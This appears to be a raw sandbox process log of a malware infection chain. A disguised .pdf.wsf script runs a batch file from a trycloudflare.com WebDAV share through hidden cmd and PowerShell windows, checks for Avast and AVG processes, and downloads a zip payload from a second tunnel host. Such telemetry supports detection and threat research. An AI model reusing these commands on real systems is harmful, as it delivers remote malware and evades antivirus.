wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\RE_018903890241.pdf.wsf
1636cmd.exe "C:\Windows\System32\cmd.exe" /c start /min \\carry-lately-hills-systematic.trycloudflare.com@SSL\DavWWWRoot\klm.bat
2224powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\carry-lately-hills-systematic.trycloudflare.com@SSL\DavWWWRoot\klm.bat\" hidden' -WindowStyle Hidden"
1472cmd.exe "C:\Windows\system32\cmd.exe" /c "\\carry-lately-hills-systematic.trycloudflare.com@SSL\DavWWWRoot\klm.bat" hidden
2692tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
2796find.exe find /i "AvastUI.exe"
2860tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
2800find.exe find /i "avgui.exe"
1376powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://newcastle-rating-artificial-commissioners.trycloudflare.com/bab.zip' -OutFile 'C:\Users\test22\Downloads\downloaded.zip' } catch { exit 1 }"
2160